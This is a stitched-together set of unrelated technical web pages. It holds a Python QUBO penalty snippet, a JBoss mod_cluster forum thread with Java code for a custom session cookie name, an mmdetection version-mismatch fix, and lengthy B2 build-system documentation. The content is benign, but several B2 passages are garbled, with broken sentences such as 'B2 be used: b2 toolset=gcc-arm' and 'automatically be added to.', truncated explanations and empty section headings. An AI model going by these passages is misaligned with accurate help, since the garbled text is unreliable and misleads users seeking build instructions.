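    equality constraints become weighted penalties in a QUBO."""
    n = len(linear)
    best_x, best_val = None, float("inf")
    for bits in product([0, 1], repeat=n):
        objective = sum(c * x for c, x in zip(linear, bits))
        violation = sum(bits) - constraint_rhs
        value = objective + penalty * violation ** 2
        if value < best_val:
            best_x, best_val = bits, value
    return best_x, best_val

# Pick exactly one variable, preferring the cheapest coefficient.
x, val = solve_qubo_with_penalty([3.0, 1.0, 2.0], constraint_rhs=1)
# x == (0, 1, 0), val == 1.0
```

With a sufficiently large penalty factor, the unconstrained minimum coincides with the constrained optimum, which is why the choice of `penalty` matters for the real solver as well.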
https://qiskit.org/documentation/stable/0.19/stubs/qiskit.optimization.algorithms.MinimumEigenOptimizer.html
Configuring sticky session attribute name
leaqui, Jun 28, 2017 9:16 AM

Hi, is it possible to configure the sticky session attribute name? I need to use a name different from JSESSIONID. I've tried:

ProxyPass / balancer://xxxxx/ stickysession=TESTSESSIONID|testsessionid
ProxyPassReverse / balancer://xxxxx/ stickysession=TESTSESSIONID|testsessionid

but it didn't work. Thanks in advance.
Leandro

1. Re: Configuring sticky session attribute name
jfclere, Jul 4, 2017 11:41 AM (in response to leaqui)

How are the balancer members defined?

2. Re: Configuring sticky session attribute name
leaqui, Jul 4, 2017 3:38 PM (in response to jfclere)

Thanks for replying, Jean. We use system properties:

modcluster.balancer.name = xxxxx
modcluster.proxy.list = balancer.ip:port

3. Re: Configuring sticky session attribute name
jfclere, Jul 6, 2017 7:49 AM (in response to leaqui)

Try:

modcluster.balancer.StickySessionCookie = xxxx

4. Re: Configuring sticky session attribute name
leaqui, Jul 7, 2017 10:04 AM (in response to jfclere)

It didn't work, Jean. Is it possible to configure, at the balancer, a cookie name for the session ID different from what is used in the back-end server?

What I want to do is to manage the sticky session duration, so that when a client doesn't make requests for a period of time, the next request could go to a server other than the original one, without losing its session.

We have a distributable application that keeps a reference to the logged-in user in the web session. But at login time, web session replication isn't fast enough for the requests that follow the login request. So if, for those requests, the balancer chooses a node to which the session hasn't been replicated yet, the user wouldn't be in the session and an error would occur.

The solution I found is using a cookie A at the back-end server and a cookie B at the balancer, and managing both cookies at the client. At the beginning I set B=A, but when there is no activity for a period of time, I clear B so that the balancer can choose another server.
A few months ago I asked a question ("Sticky session duration", load balancing, Stack Overflow) and posted this solution, but I couldn't make it work. Is [MODCLUSTER-477] "Broken design: session cookie name should be specified on the Context level instead of the Engine level…" related to this? Thanks in advance.

5. Re: Configuring sticky session attribute name
jfclere, Jul 7, 2017 11:52 AM (in response to leaqui)

"Is it possible to configure, at the balancer, a cookie name for the session ID different from what is used in the back-end server?"

I don't understand what you want to achieve with that... balancers don't store sessions or session information, so they can't know when a session has expired. MODCLUSTER-477 isn't related to your problem.

6. Re: Configuring sticky session attribute name
leaqui, Jul 7, 2017 2:02 PM (in response to jfclere)

I want to achieve a better load balance between back-end servers. Imagine 2 servers (X, Y) and 6 clients (A, B, C, D, E, F) configured with sticky sessions. At the beginning, A, C and E start sessions with X, and B, D and F start sessions with Y. Later A, C and E end their sessions. The result is a system that is not well balanced, because Y has 3 active sessions and X doesn't have any. Some of our sessions are heavyweight and last for 8 hours, so this problem gets bigger.

7. Re: Configuring sticky session attribute name
leaqui, Jul 10, 2017 1:27 PM (in response to leaqui)

8. Re: Configuring sticky session attribute name
pferraro, Jul 11, 2017 7:52 AM (in response to leaqui)

leaqui: What you are looking for is a mechanism for the servers to rebalance the sessions such that work is redistributed following a change to your server topology, and yet session stickiness is preserved. I am not sure what you hope to achieve by changing the cookie name, but, in general, load balancers do not have any knowledge of where a given session is located. This is, however, typically supported by your application server itself.
WildFly's distributed session manager supports this, for one.

9. Re: Configuring sticky session attribute name
leaqui, Jul 11, 2017 10:54 AM (in response to pferraro)

Thanks, pferraro, for answering.

Paul Ferraro wrote: "What you are looking for is a mechanism for the servers to rebalance the sessions such that work is redistributed following a change to your server topology, and yet session stickiness is preserved."

The server topology is not changed. What has changed is the number of clients connected to server X, making the cluster unbalanced in a "standard" sticky session scenario.

Paul Ferraro wrote: "I am not sure what you hope to achieve by changing the cookie name, but, in general, load balancers do not have any knowledge of where a given session is located. This is, however, typically supported by your application server itself."

What I am looking for is a better load balance after the scenario of 2 servers and 6 clients I mentioned before. A way to achieve this is implementing a duration for the sticky session, so that after a period of time the cluster can be balanced again. The way I found to implement a sticky session duration is to have the balancer look at another cookie (MYSESSIONID, different from JSESSIONID); when the period of time has elapsed, the client clears the MYSESSIONID cookie, so the balancer must assign a server following the configured metrics, re-balancing the cluster.

Paul Ferraro wrote: "WildFly's distributed session manager supports this, for one."

I am using JBoss AS 7; does WildFly implement some mechanism for re-balancing the cluster? Again, thanks for your time, Paul.

10. Re: Configuring sticky session attribute name
leaqui, Jul 19, 2017 3:23 PM (in response to leaqui)

Finally I've found a way to configure the session cookie name, but I needed to make some minor changes in mod_cluster-container-jbossweb.
I've created a JBossWebEngine subclass:

package org.jboss.modcluster.container.jbossweb;

import org.apache.catalina.Engine;
import org.jboss.modcluster.container.Server;
import org.jboss.modcluster.container.catalina.CatalinaFactoryRegistry;

public class CustomJBossWebEngine extends JBossWebEngine {

    private static final String CUSTOM_SESSION_COOKIE_NAME_ATT =
            "org.jboss.modcluster.container.jbossweb.customSessionCookieName";
    private static final String CUSTOM_SESSION_PARAMETER_NAME_ATT =
            "org.jboss.modcluster.container.jbossweb.customSessionParameterName";

    private String sessionCookieName;
    private String sessionParameterName;

    public CustomJBossWebEngine(CatalinaFactoryRegistry registry, Engine engine, Server server) {
        super(registry, engine, server);
    }

    @Override
    public String getSessionCookieName() {
        if (this.sessionCookieName == null) {
            this.sessionCookieName =
                    System.getProperty(CUSTOM_SESSION_COOKIE_NAME_ATT, super.getSessionCookieName());
        }
        return this.sessionCookieName;
    }

    @Override
    public String getSessionParameterName() {
        if (this.sessionParameterName == null) {
            this.sessionParameterName =
                    System.getProperty(CUSTOM_SESSION_PARAMETER_NAME_ATT, super.getSessionParameterName());
        }
        return this.sessionParameterName;
    }
}

And an EngineFactory implementation:

package org.jboss.modcluster.container.jbossweb;

import org.jboss.modcluster.container.Engine;
import org.jboss.modcluster.container.Server;
import org.jboss.modcluster.container.catalina.CatalinaFactoryRegistry;
import org.jboss.modcluster.container.catalina.EngineFactory;

public class CustomJBossWebEngineFactory implements EngineFactory {

    @Override
    public Engine createEngine(CatalinaFactoryRegistry registry, org.apache.catalina.Engine engine, Server server) {
        return new CustomJBossWebEngine(registry, engine, server);
    }
}

And I modified the /META-INF/services/org.jboss.modcluster.container.catalina.EngineFactory file:

org.jboss.modcluster.container.jbossweb.CustomJBossWebEngineFactory

And specified the system properties:
org.jboss.modcluster.container.jbossweb.customSessionCookieName=TESTID
org.jboss.modcluster.container.jbossweb.customSessionParameterName=testid

It would be nice if you could add this to mod_cluster.
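For readers following this thread, the idea behind the two-cookie workaround can be sketched abstractly. This is an illustrative model of the routing decision, not mod_cluster's actual balancing algorithm, and all names are made up for the example:

```python
def route(balancer_cookie, session_map, server_loads):
    """Minimal sticky-session routing sketch. If the client presents a
    balancer cookie that maps to a known server, stay sticky; otherwise
    pick the least-loaded server. Clearing the cookie after idle time
    (as the poster does) triggers the rebalancing branch."""
    if balancer_cookie in session_map:
        server = session_map[balancer_cookie]
        if server in server_loads:
            return server
    # No (or cleared) cookie: fall back to the least-loaded server.
    return min(server_loads, key=server_loads.get)

loads = {"X": 0, "Y": 3}
route("sess-1", {"sess-1": "Y"}, loads)  # "Y" (sticky)
route(None, {}, loads)                   # "X" (rebalanced to the idle server)
```

The back-end session cookie (JSESSIONID) stays untouched, so a replicated session survives the switch; only the balancer-side cookie controls stickiness.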
https://developer.jboss.org/message/974115
Environment configuration: torch 1.11.0 + CUDA 11.3 (the latest at the time).

Using mmdetection for inference:

from mmdet.apis import init_detector, inference_detector

The error is reported as follows:

ImportError: /home/user/repos/mmdetection/mmdet/ops/dcn/deform_conv_cuda.cpython-37m-x86_64-linux-gnu.so: undefined symbol: _ZN6caffe26detail37_typeMetaDataInstance_preallocated_32E

The problem has been solved. The cause of the error is that the PyTorch version is too new: although OpenMMLab claims support for the latest version, this build still fails with it.

Solution: downgrade PyTorch to torch 1.6.0 + cu102 (check OpenMMLab's official GitHub for the compatibility table), uninstall and reinstall mmcv 1.3.9, and re-run the mmdetection code to resolve the error.
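The fix above amounts to pinning torch below a known-good ceiling. That constraint can be expressed as a small helper; the ceiling below is just the version that worked in this post, not an official compatibility bound, and the function names are made up for the example:

```python
def parse_version(v):
    """Turn a version string like '1.6.0' or '1.6.0+cu102' into a
    comparable tuple such as (1, 6, 0)."""
    return tuple(int(p) for p in v.split("+")[0].split("."))

# Known-good ceiling for this particular mmdetection build (assumption
# based on the post: 1.11.0 failed, 1.6.0 worked). Adjust for your setup.
MAX_SUPPORTED_TORCH = "1.6.0"

def torch_is_supported(installed):
    return parse_version(installed) <= parse_version(MAX_SUPPORTED_TORCH)
```

In practice you would compare `torch.__version__` against the table published by OpenMMLab before installing mmcv, rather than hard-coding a single value.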
https://programmerah.com/solved-mmdetection-error-importerror-home-user-repos-mmdetection-mmdet-ops-dcn-deform_conv_cuda-cpython-37m-x-51425/
1. Introduction

Want to learn about B2 features? Start with the tutorial and continue with the overview. When you're ready to try B2 in practice, go to the installation.

Building a project with B2? See the installation and then read the overview.

Setting up B2 on your project? Take a look at the overview and extender manual.

If there's anything you find unclear in this documentation, report the problem directly in the issue tracker. For more general questions, please post them to our discussion forums.

2. Installation

Unpack the release. On the command line, go to the root of the unpacked tree. Run either .\bootstrap.bat (on Windows) or ./bootstrap.sh (on other operating systems). Then run:

$ ./b2 install --prefix=PREFIX

where PREFIX is a directory where you want B2 to be installed. Optionally, add PREFIX/bin to your PATH environment variable. Run:

$ PREFIX/bin/b2

A simple executable should be built.

3. Tutorial

This section will guide you through the most basic features of B2. We will start with the "Hello, world" example, learn how to use libraries, and finish with testing and installing features.

3.1. Hello, world

The simplest project that B2 can construct is stored in the example/hello/ directory. The project is described by a file called Jamfile that contains:

exe hello : hello.cpp ;

3.2. Properties

To represent aspects of target configuration such as debug and release variants, or single- and multi-threaded builds portably, B2 uses features with associated values. For example, the debug-symbols feature can have a value of on or off. A property is just a (feature, value) pair. When a user initiates a build, the desired properties are passed on the command line, for example:

b2 release inlining=off debug-symbols=on

Properties on the command-line are specified with the syntax:

feature-name=feature-value

The release and debug that we have seen in b2 invocations are just a shorthand way to specify values of the variant feature.
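The token classification just described, where an equal sign marks a property and bare words like release are shorthand for values of the implicit variant feature, can be modeled in a short sketch. This is an illustration of the convention only, not B2's implementation, and the set of implicit values below is a small assumed subset:

```python
# Assumed subset of implicit feature values for the example.
IMPLICIT_VALUES = {"release": "variant", "debug": "variant"}

def parse_build_request(tokens):
    """Split command-line tokens into (feature, value) properties and
    target names, expanding implicit-feature shorthands like 'release'."""
    properties = {}
    targets = []
    for token in tokens:
        if "=" in token:
            feature, value = token.split("=", 1)
            properties[feature] = value
        elif token in IMPLICIT_VALUES:
            properties[IMPLICIT_VALUES[token]] = token
        else:
            targets.append(token)
    return properties, targets

props, targets = parse_build_request(["release", "inlining=off", "debug-symbols=on"])
# props == {"variant": "release", "inlining": "off", "debug-symbols": "on"}
```

Note how `release` and `variant=release` land in the same place, which is exactly the equivalence the tutorial states next.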
For example, the command above could also have been written this way:

b2 variant=release inlining=off debug-symbols=on

variant is so commonly used that it has been given special status as an implicit feature: B2 will deduce its identity just from the name of one of its values. A complete description of features can be found in the section called "Features and properties".

3.2.1. Build Requests and Target Requirements

The set of properties specified on the command line constitutes a build request: a description of the desired properties for building the requested targets. The properties actually used usually combine the build request with properties specified in the project's Jamfile (and its other Jamfiles, as described in the section called "Project Hierarchies"). For example, the locations of `#include`d header files are normally not specified on the command-line, but described in Jamfiles as target requirements and automatically combined with the build request for those targets. Multi-threaded compilation is another typical target requirement. When the command-line explicitly contradicts a target's requirements, the target requirements usually override (or, in the case of "free" features like <include>, [1] augment) the build request.

3.2.2. Project Attributes

3.3. Project Hierarchies

So far we have only considered examples with a single project described by one user-written Jamfile. A typical large codebase consists of many projects organized into a tree; each sub-project is described by its own Jamfile, and its parent project is determined by the nearest Jamfile in an ancestor directory. For example, in the following directory layout:

top/
|
+-- Jamfile
|
+-- app/
|   |
|   `-- Jamfile
|
`-- util/
    |
    `-- foo/
        |
        `-- Jamfile

If the top-level Jamfile has <include>/home/ghost/local in its requirements, then all of its sub-projects will have it in their requirements, too. Of course, any project can add include paths to those specified by its parents. [2] More details can be found in the section called "Projects".

Invoking b2 without explicitly specifying any targets on the command line builds the project rooted in the current directory. Building a project does not automatically cause its sub-projects to be built unless the parent project's Jamfile explicitly requests it. In our example, top/Jamfile might contain:

build-project app ;

which would cause the project in top/app/ to be built whenever the project in top/ is built.
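The requirement inheritance described above can be modeled in a few lines. The helper below is purely illustrative (B2's real property refinement is richer); it only shows that free requirements such as <include> accumulate from parent to child:

```python
def project_requirements(own, parent=None):
    """A child project's effective requirements are its parent's plus its
    own; free features like <include> accumulate rather than override."""
    inherited = list(parent) if parent else []
    return inherited + [r for r in own if r not in inherited]

top = project_requirements(["<include>/home/ghost/local"])
app = project_requirements(["<include>../util/foo"], parent=top)
# app == ["<include>/home/ghost/local", "<include>../util/foo"]
```

The child keeps the parent's include path and appends its own, matching the tutorial's statement that any project can add include paths to those of its parents.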
However, targets in top/util/foo/ will be built only if they are needed by targets in top/ or top/app/.

3.4. Dependent Targets

When building a target X that depends on a target Y (for example, an executable that links to a library), Y's build properties matter as well. Suppose we run:

b2 app optimization=full define=USE_ASM

Which properties will be used to build foo? The answer is that some features are propagated: B2 applies a propagated feature such as optimization to dependencies like foo as well, while a non-propagated ("free") feature such as define applies only to the target it was requested for, here app. To refer to the library conveniently from other Jamfiles, a project id can be assigned to util/foo; for that, top/Jamfile must be modified. Note that project ids are global: two Jamfiles are not allowed to assign the same project id to different directories.

3.5. Static and shared libraries

Libraries can be either static, which means they are included in executable files that use them, or shared (a.k.a. dynamic), which are only referred to from executables and must be available at run time. B2 can create and use both kinds; the kind is controlled by the link feature, whose default value is shared.

3.6. Conditions and alternatives

Target requirements can be conditional, applying only when certain other properties are present:

lib network : network.cpp
  : <link>shared:<define>NETWORK_LIB_SHARED
    <variant>release:<define>EXTRA_FAST ;

In the example above, whenever network is built with <link>shared, <define>NETWORK_LIB_SHARED will be in its properties, too. A main target can also be declared several times, as alternatives selected by their requirements:

lib demangler : dummy_demangler.cpp ;                # (1)
lib demangler : demangler_gcc.cpp : <toolset>gcc ;   # (2)
lib demangler : demangler_msvc.cpp : <toolset>msvc ; # (3)

When building demangler, B2 picks the alternative whose requirements best match the requested build properties.

3.7. Prebuilt targets

Prebuilt targets let a project refer to libraries that are built outside of B2, such as system libraries. Different variants of a prebuilt library can be declared as alternatives, so that if we build the release and debug versions of app, each will link against the matching version of the library.

4. Overview

This section will provide the information necessary to create your own projects using B2. The information provided here is relatively high-level; the Reference as well as the on-line help system must be used to obtain low-level documentation.

B2 has two parts: a build engine with its own interpreted language, and B2 itself, implemented in that language. The chain of events when you type b2 on the command line is as follows:

- The B2 executable tries to find B2 modules and loads the top-level module. The exact process is described in the section called "Initialization".
- The top-level module loads user-defined configuration files, such as user-config.jam, and the project's Jamfiles.
- B2 decides which targets should be built and how. That information is passed back to Boost.Jam, which takes care of actually running the scheduled build action commands.
So, to be able to successfully use B2, you need to know only four things:

- How to configure B2
- How to declare targets in Jamfiles
- How the build process works
- Some basics of the Boost.Jam language (see the section called "Boost.Jam Language")

4.1. Concepts

B2 has a few unique concepts that are introduced in this section. The best way to explain the concepts is by comparison with more classical build tools. When using any flavor of make, you name concrete targets and the commands that create them; to support multi-variant builds, B2 instead introduces the concept of a metatarget (also called a main target): an object that is created when the build description is parsed and can be called later with specific build properties to generate actual targets.

Consider an example:

exe a : a.cpp ;

When this declaration is parsed, B2 creates a metatarget, but does not yet decide what files must be created, or what commands must be used. After all build files are parsed, B2 considers the properties requested on the command line and calls the metatarget with them; only then are the concrete files and commands determined.

A build property is a variable that affects the build process. It can be specified on the command line, and is passed when calling a metatarget. While all build tools have a similar mechanism, B2 differs by requiring that all build properties are declared in advance, and by providing a large set of properties with portable semantics.

The final concept is property propagation. B2 does not require that every metatarget be called with the same properties: the top-level metatargets are called with the properties from the command line, and each metatarget decides which of those properties to pass on to its dependencies.

4.2. Boost.Jam Language

This section describes the basics of the Boost.Jam language, enough to write Jamfiles. Syntactically, a Boost.Jam program consists of two kinds of elements: keywords (which have a special meaning to Boost.Jam) and literals. Consider this code:

a = b ;

which assigns the value b to the variable a. Here, a and b are literals, while = and ; are keywords. Variable values are accessed using the $(variable) syntax. Conditions have the form a operator b, where operator is one of the comparison operators, and the return statement returns values to the caller of the rule. Modules are imported with:

import module ;
import module : rule ;

The first form imports the specified module. All rules from that module are made available using the qualified name: module.rule.
The second form imports the specified rules only, and they can be called using unqualified names.

4.3. Configuration

On startup, B2 searches and reads three configuration files: site-config.jam, user-config.jam, and project-config.jam. The first one is usually installed and maintained by a system administrator, and the second is for the user to modify. You can edit the one in the top-level directory of your B2 installation or create a copy in your home directory and edit the copy. The third is used for project-specific configuration. The following table explains where the files are searched. Any of these files may also be overridden on the command line.

Toolsets are configured in these files with the using rule. For example:

using gcc ;

All the supported tools are documented in the section called "Builtin tools", including the specific options they take. Some general notes that apply to most C++ compilers are below.

For all the C++ compiler toolsets that B2 supports out of the box, the invocation command can be specified explicitly; some toolsets will use that path to take additional actions required before invoking the compiler, such as calling vendor-supplied scripts to set up its required environment variables. When the compiler executables for C and C++ are different, the path to the C++ compiler executable must be specified. To configure several compilers, invoke the using rule once per toolset:

using gcc : 5 ;
using clang : 3.9 ;
using msvc : 14.0 ;

Note that in the first call to using, the compiler found in the PATH will be used, and there is no need to explicitly specify the command.

Many toolsets have an options parameter to fine-tune the configuration. All of B2's standard compiler toolsets accept four options (cflags, cxxflags, compileflags and linkflags) specifying flags that will always be passed to the corresponding tools. There must not be a space between the tag for the option name and the value. If multiple options of the same type are needed, they can be concatenated with quotes or given as multiple instances of the option tag.
using gcc : 5 : : <cxxflags>"-std=c++14 -O2" ;
using clang : 3.9 : : <cxxflags>-std=c++14 <cxxflags>-O2 ;

Multiple variations of the same tool can be used for most tools. These are delineated by the version passed in. Because the dash '-' cannot be used here, the convention has become to use the tilde '~' to delineate variations:

using gcc : 5 : g++-5 : ;                               # default is C++ 98
using gcc : 5~c++03 : g++-5 : <cxxflags>-std=c++03 ;    # C++ 03
using gcc : 5~gnu03 : g++-5 : <cxxflags>-std=gnu++03 ;  # C++ 03 with GNU
using gcc : 5~c++11 : g++-5 : <cxxflags>-std=c++11 ;    # C++ 11
using gcc : 5~c++14 : g++-5 : <cxxflags>-std=c++14 ;    # C++ 14

These are then used as normal toolsets:

b2 toolset=gcc-5 stage
b2 toolset=gcc-5~c++14 stage

4.4. Invocation

To invoke B2, type b2 on the command line. Three kinds of command-line tokens are accepted, in any order:

- options: Options start with either one or two dashes. The standard options are listed below, and each project may add additional options.
- properties: Properties specify details of what you want to build (e.g. debug or release variant). Syntactically, all command line tokens with an equal sign in them are considered to specify properties. In the simplest form, a property looks like feature=value.
- targets: All tokens that are neither options nor properties specify what targets to build. The available targets entirely depend on the project you are building.

4.4.1. Examples

b2 toolset=gcc variant=debug optimization=space

4.4.2. Options

B2 recognizes the following command line options.

--help
  Invokes the online help system. This prints general information on how to use the help system with additional --help* options.

--clean
  Cleans all targets in the current directory and in any sub-projects. Note that unlike the clean target in make, you can use --clean together with target names to clean only specific targets.

--build-dir
  Changes the build directories for the projects being built. When this option is specified, the build directory is computed by concatenating the value of the --build-dir option, the project name specified in Jamroot, and the build dir specified in Jamroot (or bin, if none is specified).
  The option is primarily useful when building from read-only media, when you can't modify Jamroot.

--abbreviate-paths
  Compresses target paths by abbreviating each component. This option is useful to keep paths from becoming longer than the filesystem supports. See also the section called "Target Paths".

--hash
  Compresses target paths using an MD5 hash. This option is useful to keep paths from becoming longer than the filesystem supports. It produces shorter paths than --abbreviate-paths does, but at the cost of making them less understandable. See also the section called "Target Paths".

--version
  Prints information on the B2 and Boost.Jam versions.

-a
  Causes all files to be rebuilt.

-n
  Do not execute the commands, only print them.

-q
  Stop at the first error, as opposed to continuing to build targets that don't depend on the failed ones.

-j N
  Run up to N commands in parallel. The default number of jobs is the number of detected available CPU threads. Note: there are circumstances when that default can be larger than the allocated CPU resources, for instance in some virtualized container installs.

--config=filename
  Override all configuration files.

--site-config=filename
  Override the default site-config.jam.

--user-config=filename
  Override the default user-config.jam.

--project-config=filename
  Override the default project-config.jam.

--debug-configuration
  Produces debug information about the loading of B2 and toolset files.

--debug-building
  Prints what targets are being built and with what properties.

--debug-generators
  Produces debug output from the generator search process. Useful for debugging custom generators.

-d0
  Suppress all informational messages.

-d N
  Enable cumulative debugging levels from 1 to N. Values are:

  - Show the actions taken for building targets, as they are executed (the default).
  - Show "quiet" actions and display all action text, as they are executed.
  - Show dependency analysis, and target/source timestamps/paths.
  - Show arguments and timing of shell invocations.
  - Show rule invocations and variable expansions.
  - Show directory/header file/archive scans, and attempts at binding to targets.
  - Show variable settings.
  - Show variable fetches, variable expansions, and evaluation of "if" expressions.
  - Show variable manipulation, scanner tokens, and memory usage.
  - Show profile information for rules, both timing and memory.
  - Show parsing progress of Jamfiles.
  - Show graph of target dependencies.
  - Show change target status (fate).

-d +N
  Enable debugging level N.

-o file
  Write the updating actions to the specified file instead of running them.

-s var=value
  Set the variable var to value in the global scope of the jam language interpreter, overriding variables imported from the environment.

4.4.3. Properties

If you have more than one version of a given C++ toolset (e.g. configured in user-config.jam, or autodetected, as happens with msvc), you can request the specific version by passing toolset-version as the value of the toolset feature. Multiple features may be grouped by using a forward slash:

b2 gcc/link=shared msvc/link=static,shared

This will build 3 different variants altogether.

4.4.4. Targets

All command line elements that are neither options nor properties are the names of the targets to build. See the section called "Target identifiers and references". If no target is specified, the project in the current directory is built.

4.5. Declaring Targets

A main target is declared by invoking one of the main target rules, which share this common signature:

rule rule-name ( main-target-name : sources + : requirements * : default-build * : usage-requirements * )

main-target-name is the name used to request the target on the command line and to use it from other main targets. A main target name may contain alphanumeric characters, dashes and underscores. When a target is built, B2 combines the requirements of the project where the target is declared with the explicitly specified requirements. The same is true for usage-requirements. More details can be found in the section called "Property refinement".

4.5.1. Name

4.5.2.
Sources

The list of sources specifies what should be processed to produce the target. Most commonly, it is a list of files:

exe a : a.cpp ;           (1)
exe b : [ glob *.cpp ] ;  (2)

(1) a.cpp is the only source file
(2) all .cpp files in this directory

Sources can also refer to other main targets, in the same or another project:

exe b : b.cpp ..//utils ;
exe c : c.cpp /boost/program_options//program_options ;

Since all project ids start with a slash, ".." here is a directory name, not a project id.

4.5.3. Requirements

Requirements are the properties that should always be present when building a target. Typically, they are includes and defines:

exe hello : hello.cpp : <include>/opt/boost <define>MY_DEBUG ;

Requirements can also be conditional, applying only when other properties are present:

lib network : network.cpp
  : <link>shared:<define>NETWORK_LIB_SHARED
    <variant>release:<define>EXTRA_FAST ;

In the example above, whenever network is built with <link>shared, <define>NETWORK_LIB_SHARED will be in its properties, too. A target can also ignore a specific project requirement by adding a minus sign before the property, for example:

exe main : main.cpp : -<define>UNNECESSARY_DEFINE ;

This syntax is the only way to ignore free properties, such as defines, from a parent.

4.5.4. Default Build

The default-build specifies the properties to be used when no other values for the same features are given. The difference between the requirements and the default-build is that the requirements cannot be overridden in any way.

4.5.5. Additional Information

When no target is requested on the command line, all targets in the current project will be built. If a target should be built only by explicit request, this can be expressed by the explicit rule:

explicit install_programs ;

4.6. Projects

Targets are grouped into projects. Each project is described by a file called Jamroot or Jamfile. When loading a project, B2 looks for either Jamroot or Jamfile. They are handled identically, except that if the file is called Jamroot, the search for a parent project is not performed. A Jamfile without a parent project is also considered the top-level project.

Even when building in a subproject directory, parent project files are always loaded before those of their sub-projects, so that every definition made in a parent project is always available to its children. The loading order of any other projects is unspecified. Even if one project refers to another via the use-project rule or a target reference, no specific order should be assumed.

4.7.
The Build Process When you’ve described your targets, you want B2 to run the right tools and create the needed targets. This section will describe two things: how you specify what to build, and how the main targets are actually constructed. The most important thing to note is that in B2, unlike other build tools, the targets you declare do not correspond to specific files. 4.7.1. Build Request The command line specifies which targets to build and with which properties. For example: b2 app1 lib1//lib1 gcc debug optimization=full The complete syntax, which has some additional shortcuts, is described in the section called “Invocation”. 4.7.2. Building a main target To construct a main target from sources, B2 uses "generators" — objects that correspond to tools like compilers and linkers. Each generator declares what type of targets it can produce and what type of sources it requires. Using this information, B2 determines which generators must be run to produce a specific target from specific sources. When generators are run, they return the "real" targets. Finally, the usage requirements to be returned are computed: the conditional properties in usage requirements are expanded and the result is returned. 4.7.3. Building a Project Often, a user builds a complete project, not just one main target. In fact, invoking b2 without any target names builds the project in the current directory. 5. Common tasks This section describes the main target types that B2 supports out-of-the-box. Unless otherwise noted, all mentioned main target rules have the common signature, described in the section called “Declaring Targets”. 5.1. Programs Programs are created using the exe rule. Generally, sources can include C and C++ files, object files and libraries. B2 will automatically try to convert targets of other types. 5.2. Libraries Library targets are created using the lib rule. When a library uses another library, that other library should be listed among its sources, even for searched and prebuilt libraries; otherwise, static linking on Unix will not work. For example: lib z ; lib png : z : <name>png ; Usage requirements are often very useful for defining library targets. 5.3. Alias The alias rule gives an alternative name to a group of targets. 5.4. Installing This section describes various ways to install built targets and arbitrary files. 5.4.1. Basic install 5.4.2. Installing with all dependencies. 5.4.3. Preserving Directory Hierarchy. 5.4.4.
Installing into Several Directories alias install : install-bin install-lib ; install install-bin : applications : /usr/bin ; install install-lib : helper : /usr/lib ; Because the install rule just copies targets, most free features [3] have no effect when used in requirements of the install rule. The only two that matter are dependency and, on Unix, dll-path. 5.5. Testing B2's behavior ensures that you cannot miss a unit test failure. For rules that run executables, the file recording a successful test is called target-name.passed, and for the other rules it is called target-name.test. It is possible to process the B2 output and the presence/absence of the *.test files created when a test passes into a human-readable status table of tests. Such processing utilities are not included in B2. The following features adjust testing behavior in the current implementation. testing.launcher By default, the executable is run directly. Sometimes, it is desirable to run the executable using some helper command. You should use this property to specify the helper command. 5.6. Custom commands For most main target rules, B2 automatically figures out the commands to run. When you want to use new file types or support new tools, one approach is to extend B2 to support them smoothly, as documented in the Extender Manual. For simple cases, the make rule allows you to construct a file from a source by running a command you specify, and the generate rule allows you to describe a transformation using B2’s virtual targets, which is higher-level than the make rule. Suppose you want to create the file file.out from the file file.in by running the command in2out. Here is how you would do this in B2: make file.out : file.in : @in2out ; actions in2out { in2out $(<) $(>) } If you run b2 and file.out does not exist, B2 will run the action to create it. The generate rule is used when you want to express transformations using B2’s virtual targets, as opposed to just filenames. The generate rule has the standard main target rule signature, but you are required to specify the generating-rule property.
The value of the property should be in the form @rule-name; the named rule should have the following signature: rule generating-rule ( project name : property-set : sources * ) The generate example in the B2 distribution illustrates how the generate rule can be used. 5.7. Precompiled Headers Precompiled headers are a mechanism to speed up compilation by creating a partially processed version of some header files, and then using that version during compilations rather than repeatedly parsing the original headers. B2 supports precompiled headers with the gcc and msvc toolsets. B2 will include the header automatically and on-demand. Declare a cpp-pch target with the header as a source; use the c-pch rule instead if you want to use the precompiled header in C programs. The pch example in the B2 distribution can be used as reference. Please note the following: The build properties used to compile the source files and the precompiled header must be the same. Consider using project requirements to assure this. Precompiled headers must be used purely as a way to improve compilation time, not to save the number of #include statements. If a source file needs to include some header, explicitly include it in the source file, even if the same header is included from the precompiled header. This makes sure that your project will build even if precompiled headers are not supported. Prior to version 4.2, the gcc compiler did not allow anonymous namespaces in precompiled headers, which limits their utility. See the bug report for details. Previously, B2 did not automatically include the header; the user was required to include the header at the top of every source file the precompiled header would be used with. 5.8. Generated headers Usually, B2 handles implicit dependencies completely automatically. For example, for C++ files, all #include statements are found and handled. The only aspect where user help might be needed is implicit dependency on generated files. By default, B2 handles such dependencies within one main target. For example, assume that main target "app" has two sources, "app.cpp" and "parser.y". The latter source is converted into "parser.c" and "parser.h".
Then, if "app.cpp" includes "parser.h", B2 will detect this dependency. Moreover, since "parser.h" will be generated into a build directory, the path to that directory will automatically be added to. 5.9. Cross-compilation B2 be used: b2 toolset=gcc-arm If you want to target a operating system names, please see the documentation for target-os feature. When using the msvc compiler, it’s only possible to cross-compile to a 64-bit system on a 32-bit host. Please see the section called “64-bit support” for details. 5.10. Package Managers B2 support automatic, or manual, loading of generated build files from package managers. For example using the Conan package manager which generates conanbuildinfo.jam files B2 will load that files automatically when it loads the project at the same location. The included file can define targets and other project declarations in the context of the project it’s being loaded into. Control over what package manager file is loaded can be controlled with (in order of priority): With the use-packagesrule. Command line argument --use-package-manager=X. Environment variable PACKAGE_MANAGER_BUILD_INFO. Built-in detection of the file. Currently this includes: "conan". use-packages rule: rule use-packages ( name-or-glob-pattern ? ) The use-packages rule allows one to specify in the projects themselves kind of package definitions to use either as the ones for a built-in package manager support. For example: use-packages conan ; Or to specify a glob pattern to find the file with the definitions. For instance: use-packages "packages.jam" ; --use-package-manager command line option: The --use-package-manager=NAME command line option allows one to non-intrusively specify per invocation which of the built-in package manager types to use. PACKAGE_MANAGER_BUILD_INFO variable: The PACKAGE_MANAGER_BUILD_INFO variable, which is taken from the environment or defined with the -sX=Y option, specifies a glob pattern to use to find the package definitions. 
